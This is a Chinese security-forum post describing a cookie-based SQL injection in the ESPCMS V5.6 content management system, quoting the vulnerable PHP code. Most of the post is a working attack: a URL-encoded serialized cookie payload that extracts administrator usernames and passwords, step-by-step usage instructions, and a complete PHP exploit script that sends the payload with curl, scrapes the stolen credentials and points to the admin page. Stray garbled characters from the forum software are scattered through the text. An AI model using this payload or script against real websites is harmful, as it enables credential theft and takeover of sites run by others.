中国网络渗透测试联盟

标题: 易思ESPCMS Cookie注入 [打印本页]
作者: admin    时间: 2013-4-19 19:09
标题: 易思ESPCMS Cookie注入
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统。

易思ESPCMS企业网站管理系统V5.6存在Cookie注入漏洞,攻击者可利用此漏洞破坏应用,执行未授权操作。

function in_list() {parent::start_pagetemplate();$lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;$cartid = $this->fun->accept('ecisp_order_list', 'C'); //接收cookies[‘ecisp_order_list’]$cartid = stripslashes(htmlspecialchars_decode($cartid));$uncartid = !empty($cartid) ? unserialize($cartid) : 0; //$cartid有特殊的格式要求if ($uncartid && is_array($uncartid)) {$didarray = $this->fun->key_array_name($uncartid, 'did', 'amount');$didlist = $this->fun->format_array_text(array_keys($didarray), ',');if (!empty($didlist)) {$db_table = db_prefix . 'document';$db_where = "isclass=1 AND isorder=1 AND did in($didlist) ORDER BY did DESC";$sql="SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,color,author,source,pic,link,oprice,bprice,click,addtime,template,filename,filepath FROM $db_table WHERE $db_where"; //动态构造sql语句$rs = $this->db->query($sql); //直接带入查询
" e6 o! f3 v) Z: |4 e8 F# L4 O
直接获取cookies[`ecisp_order_list`]的值,没有经过过滤,直接被用来构造了sql语句,并带入了查询。所以此处形成了一个cookie注入。7 t' t; L4 H' [& i' {5 I/ e0 \

接收到的cookies[`ecisp_order_list`]在整个传递过程中,经过了htmlspecialchars_decode()、stripslashes()、unserialize()、key_array_name()、array_keys()、format_array_text()几个函数。

其中stripslashes()使得注入语句可以无视GPC的影响。

但是,由于unserialize()的使用,使得构造exp的难度加大;因为传入unserialize()的值,必须使用一种规定的特殊格式(实施上,我也没有完全吃透这个特殊格式)

我就依靠运气,和一点小技巧,成功地构造出了exp,这里就不细说了。大家可以通过打印几个函数的返回值,来找到构造的方法。(或者,也可以通过下面的exp,来找寻一些规律)

a%3a1%3a%7bs%3a3%3a%22k23%22%3ba%3a2%3a%7bs%3a3%3a%22did%22%3bs%3a159%3a%2224)+and+1%3d2+union+select+1%2c2%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%2c16%2cpassword%2cusername%2c19%2c20%2c21%2c22%2c23%2c24%2c25%2c26%2c27%2c28%2c29%2c30%2c31+from+espcms_admin_member+where+1+in+(1%22%3bs%3a6%3a%22amount%22%3bi%3a1%3b%7d%7d

利用方法

GET URL+ index.php?ac=order&at=list

SetCookie为

ecisp_order_list=a%3a1%3a%7bs%3a3%3a%22k23%22%3ba%3a2%3a%7bs%3a3%3a%22did%22%3bs%3a159%3a%2224)+and+1%3d2+union+select+1%2c2%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%2c16%2cpassword%2cusername%2c19%2c20%2c21%2c22%2c23%2c24%2c25%2c26%2c27%2c28%2c29%2c30%2c31+from+espcms_admin_member+where+1+in+(1%22%3bs%3a6%3a%22amount%22%3bi%3a1%3b%7d%7d; w6 i8 \: L; t1 \- i8 U( t
http://www.myhack58.com/Article/UploadPic/2013-4/20134171444419854.jpg9 }% _+ e# p- a# K, x+ o

/ @0 F% w) @5 z4 z/ e4 D9 H+ ^$ m
5 s9 R+ o7 F' D/ G1 x; lEspcms cookie注入的exp


) T) z" t$ e! h<?phpprint_r('+-----------------------------------------------+Espcms SQL Injection ExploitAuthor: Desperado && n3wfUsing The Exploit, You Can Hack The World+-----------------------------------------------+'); if ($argc < 2){print_r('Example:php ' .$argv[0]. ' Localhost');exit;}error_reporting(3);ini_set('max_execution_time',0);$host = $argv[1]; //$cookie_file = dirname(__FILE__).'/cookie.txt'; //echo $cookie_file; $strCookie = 'ecisp_order_list=a%3a1%3a%7bs%3a3%3a%22k23%22%3ba%3a2%3a%7bs%3a3%3a%22did%22%3bs%3a159%3a%2224)+and+1%3d2+union+select+1%2c2%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%2c16%2cpassword%2cusername%2c19%2c20%2c21%2c22%2c23%2c24%2c25%2c26%2c27%2c28%2c29%2c30%2c31+from+espcms_admin_member+where+1+in+(1%22%3bs%3a6%3a%22amount%22%3bi%3a1%3b%7d%7d';$url = $host.'/index.php?ac=order&at=list';$ch = curl_init($url);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOPT_COOKIE,$strCookie);$response = curl_exec($ch);curl_close($ch);$uregex = '/(index\.php\?ac=article&at=read&did=1\">)+(.*)/i'; preg_match_all($uregex, $response, $uresult);$username = explode("<", $uresult[2][0]);$pregex = '/(<td class=\"td02 center\">)+(.*)/'; preg_match_all($pregex, $response, $presult);$password = explode("<",$presult[2][0]); if($username[0]!='' && $password[0]!=''){echo 'Inject Successfully,The username:'.$username[0]."\n";echo "The password:".$password[0]."\n";echo 'The Manager Page:'.$host.'/adminsoft'."\n";}else{echo 'Sorry,This Site is not vulnerable,Inject Failed!'."\n";}?>​
( o* m- G5 Y$ j, _5 C



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2